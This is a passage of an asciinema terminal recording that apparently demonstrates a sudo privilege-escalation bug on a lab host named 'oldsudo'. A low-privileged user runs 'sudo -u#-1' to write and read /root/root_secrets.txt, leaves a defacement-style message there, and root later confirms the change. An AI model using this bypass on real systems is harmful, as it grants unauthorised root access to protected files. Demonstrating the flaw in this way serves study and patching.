[142.84863, "o", "\u001b[?25le\u001b[37;143H7\u001b[3;7H\u001b[34h\u001b[?25h"]
[142.979829, "o", "\u001b[?25l\u001b[37;143H8\u001b[3;8H\u001b[34h\u001b[?25h"]
[143.232742, "o", "\u001b[?25ln\u001b[37;143H9\u001b[3;9H\u001b[34h\u001b[?25h"]
[143.440632, "o", "\u001b[?25lo\u001b[37;143H10\u001b[3;10H\u001b[34h\u001b[?25h"]
[143.58691, "o", "\u001b[?25lb\u001b[37;144H1\u001b[3;11H\u001b[34h\u001b[?25h"]
[143.747561, "o", "\u001b[?25lo\u001b[37;144H2\u001b[3;12H\u001b[34h\u001b[?25h"]
[143.939291, "o", "\u001b[?25ld\u001b[37;144H3\u001b[3;13H\u001b[34h\u001b[?25h"]
[144.147605, "o", "\u001b[?25ly\u001b[37;144H4\u001b[3;14H\u001b[34h\u001b[?25h"]
[144.867373, "o", "\u001b[?25l.\u001b[37;144H5\u001b[3;15H\u001b[34h\u001b[?25h"]
[145.187124, "o", "\u001b[?25l\u001b[37;144H6\u001b[3;16H\u001b[34h\u001b[?25h"]
[145.507303, "o", "\u001b[?25lW\u001b[37;144H7\u001b[3;17H\u001b[34h\u001b[?25h"]
[146.129544, "o", "\u001b[?25le\u001b[37;144H8\u001b[3;18H\u001b[34h\u001b[?25h"]
[146.403496, "o", "\u001b[?25l\u001b[37;144H9\u001b[3;19H\u001b[34h\u001b[?25h"]
[146.977479, "o", "\u001b[?25la\u001b[37;143H20\u001b[3;20H\u001b[34h\u001b[?25h"]
[147.264855, "o", "\u001b[?25lr\u001b[37;144H1\u001b[3;21H\u001b[34h\u001b[?25h"]
[147.331478, "o", "\u001b[?25le\u001b[37;144H2\u001b[3;22H\u001b[34h\u001b[?25h"]
[147.440615, "o", "\u001b[?25l\u001b[37;144H3\u001b[3;23H\u001b[34h\u001b[?25h"]
[147.572435, "o", "\u001b[?25la\u001b[37;144H4\u001b[3;24H\u001b[34h\u001b[?25h"]
[147.730473, "o", "\u001b[?25ln\u001b[37;144H5\u001b[3;25H\u001b[34h\u001b[?25h"]
[147.955214, "o", "\u001b[?25lo\u001b[37;144H6\u001b[3;26H\u001b[34h\u001b[?25h"]
[148.212739, "o", "\u001b[?25ln\u001b[37;144H7\u001b[3;27H\u001b[34h\u001b[?25h"]
[148.627802, "o", "\u001b[?25ly\u001b[37;144H8\u001b[3;28H\u001b[34h\u001b[?25h"]
[148.931114, "o", "\u001b[?25lm\u001b[37;144H9\u001b[3;29H\u001b[34h\u001b[?25h"]
[149.155751, "o", "\u001b[?25lo\u001b[37;143H30\u001b[3;30H\u001b[34h\u001b[?25h"]
[149.520978, "o", "\u001b[?25ls\u001b[37;144H1\u001b[3;31H\u001b[34h\u001b[?25h"]
[149.923542, "o", "\u001b[?25l\u001b[3;30H\u001b[K\u001b[37;144H0\u001b[3;30H\u001b[34h\u001b[?25h"]
[150.113102, "o", "\u001b[?25lu\u001b[37;144H1\u001b[3;31H\u001b[34h\u001b[?25h"]
[150.244301, "o", "\u001b[?25ls\u001b[37;144H2\u001b[3;32H\u001b[34h\u001b[?25h"]
[150.433418, "o", "\u001b[?25l\u001b[37;144H3\u001b[3;33H\u001b[34h\u001b[?25h"]
[151.090493, "o", "\u001b[?25la\u001b[37;144H4\u001b[3;34H\u001b[34h\u001b[?25h"]
[151.249218, "o", "\u001b[?25ln\u001b[37;144H5\u001b[3;35H\u001b[34h\u001b[?25h"]
[151.34516, "o", "\u001b[?25ld\u001b[37;144H6\u001b[3;36H\u001b[34h\u001b[?25h"]
[151.440816, "o", "\u001b[?25l\u001b[37;144H7\u001b[3;37H\u001b[34h\u001b[?25h"]
[151.71545, "o", "\u001b[?25lw\u001b[37;144H8\u001b[3;38H\u001b[34h\u001b[?25h"]
[151.921148, "o", "\u001b[?25lh\u001b[37;144H9\u001b[3;39H\u001b[34h\u001b[?25h"]
[151.968632, "o", "\u001b[?25la\u001b[37;143H40\u001b[3;40H\u001b[34h\u001b[?25h"]
[152.097245, "o", "\u001b[?25lt\u001b[37;144H1\u001b[3;41H\u001b[34h\u001b[?25h"]
[152.224882, "o", "\u001b[?25ln\u001b[37;144H2\u001b[3;42H\u001b[34h\u001b[?25h"]
[152.432687, "o", "\u001b[?25lo\u001b[37;144H3\u001b[3;43H\u001b[34h\u001b[?25h"]
[152.512997, "o", "\u001b[?25lt\u001b[37;144H4\u001b[3;44H\u001b[34h\u001b[?25h"]
[152.897381, "o", "\u001b[?25l.\u001b[37;144H5\u001b[3;45H\u001b[34h\u001b[?25h"]
[154.383615, "o", "\u001b[37;1H\u001b[K\u001b[3;44H\u001b[?25l\u001b[37;131H^[\u001b[3;44H"]
[154.483808, "o", "\u001b[37;131H  \u001b[3;45H"]
[154.484072, "o", "\u001b[37;141H3,44\u001b[10CAll\u001b[3;44H\u001b[34h\u001b[?25h"]
[155.040533, "o", "\u001b[?25l\u001b[37;131H:\u001b[3;44H"]
[155.04076, "o", "\u001b[37;131H\u001b[K\u001b[37;1H:\u001b[34h\u001b[?25h"]
[155.522243, "o", "w\u001b[?25l\u001b[34h\u001b[?25h"]
[156.179064, "o", "q\u001b[?25l\u001b[34h\u001b[?25h"]
[156.864946, "o", "!\u001b[?25l\u001b[34h\u001b[?25h"]
[157.666303, "o", "\r\u001b[?25l"]
[157.667026, "o", "\"/root/root_secrets.txt\""]
[157.712779, "o", " 3L, 113C written"]
[157.713638, "o", "\r\r\r\n\u001b[1m\u001b[37m\u001b[41mE137: Viminfo file is not writable: /home/user/.viminfo\u001b[0m\r\r\r\n\u001b[32mPress ENTER or type command to continue\u001b[34h\u001b[?25h"]
[158.754706, "o", "\r\n"]
[158.755993, "o", "\r\r"]
[158.757609, "o", "\r\n\u001b[0m\u001b[?1l\u001b>\u001b[?1049l"]
[158.762969, "o", "nobody@oldsudo:~$ "]
[162.784915, "o", "sudo -u#-1 vim /root/root_secrets.txt"]
[163.346514, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bcat\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[164.978882, "o", "\r\n"]
[164.999465, "o", "is a bug in sudo, I hope nobody exploits it before i can patch it.\r\n\r\nWe are nobody. We are anonymous and whatnot.\r\n"]
[165.003232, "o", "nobody@oldsudo:~$ "]
[173.649593, "o", "e"]
[173.985732, "o", "x"]
[174.865913, "o", "i"]
[175.154499, "o", "t"]
[176.096666, "o", "\r\nexit\r\n"]
[176.098191, "o", "user@oldsudo:~$ "]
[177.792794, "o", "s"]
[178.289964, "o", "u"]
[178.514665, "o", "d"]
[178.673724, "o", "o"]
[178.848622, "o", " "]
[178.960647, "o", "s"]
[179.13838, "o", "u"]
[180.51276, "o", "\r\n"]
[180.528583, "o", "root@oldsudo:/home/user# "]
[181.922344, "o", "c"]
[182.1462, "o", "d"]
[182.256696, "o", " "]
[183.77662, "o", "/"]
[184.337275, "o", "\r\n"]
[184.337543, "o", "root@oldsudo:/# "]
[185.217554, "o", "l"]
[185.29672, "o", "s"]
[185.538133, "o", "\r\n"]
[185.542299, "o", "\u001b[0m\u001b[01;34mbin\u001b[0m   \u001b[01;34mcdrom\u001b[0m  \u001b[01;34metc\u001b[0m   \u001b[01;36minitrd.img\u001b[0m      \u001b[01;34mlib\u001b[0m    \u001b[01;34mlost+found\u001b[0m  \u001b[01;34mmnt\u001b[0m  \u001b[01;34mproc\u001b[0m  \u001b[01;34mrun\u001b[0m   \u001b[01;34msnap\u001b[0m  swap.img  \u001b[30;42mtmp\u001b[0m  \u001b[01;34mvar\u001b[0m      \u001b[01;36mvmlinuz.old\u001b[0m\r\n\u001b[01;34mboot\u001b[0m  \u001b[01;34mdev\u001b[0m    \u001b[01;34mhome\u001b[0m  \u001b[01;36minitrd.img.old\u001b[0m  \u001b[01;34mlib64\u001b[0m  \u001b[01;34mmedia\u001b[0m       \u001b[01;34mopt\u001b[0m  \u001b[01;34mroot\u001b[0m  \u001b[01;34msbin\u001b[0m  \u001b[01;34msrv\u001b[0m   \u001b[01;34msys\u001b[0m       \u001b[01;34musr\u001b[0m  \u001b[01;36mvmlinuz\u001b[0m\r\n"]
[185.543267, "o", "root@oldsudo:/# "]
[188.562408, "o", "c"]
[188.786455, "o", "d"]
[188.897022, "o", " "]
[191.15424, "o", "/"]
[191.584492, "o", "r"]
[191.682649, "o", "o"]
[191.825314, "o", "o"]
[191.889071, "o", "t/"]
[192.368658, "o", "\r\n"]
[192.368861, "o", "root@oldsudo:~# "]
[192.642197, "o", "l"]
[192.850823, "o", "s"]
[192.976654, "o", "\r\n"]
[192.977663, "o", "root_secrets.txt\r\n"]
[192.977838, "o", "root@oldsudo:~# "]
[194.306454, "o", "c"]
[194.448655, "o", "a"]
[194.928912, "o", "t"]
[195.104912, "o", " "]
[195.33045, "o", "r"]
[195.472982, "o", "o"]
[195.600879, "o", "o"]
[195.681022, "o", "t_secrets.txt "]
[196.560744, "o", "\r\n"]
[196.561638, "o", "is a bug in sudo, I hope nobody exploits it before i can patch it.\r\n\r\nWe are nobody. We are anonymous and whatnot.\r\n"]
[196.561874, "o", "root@oldsudo:~# "]
[199.810391, "o", "exit\r\n"]
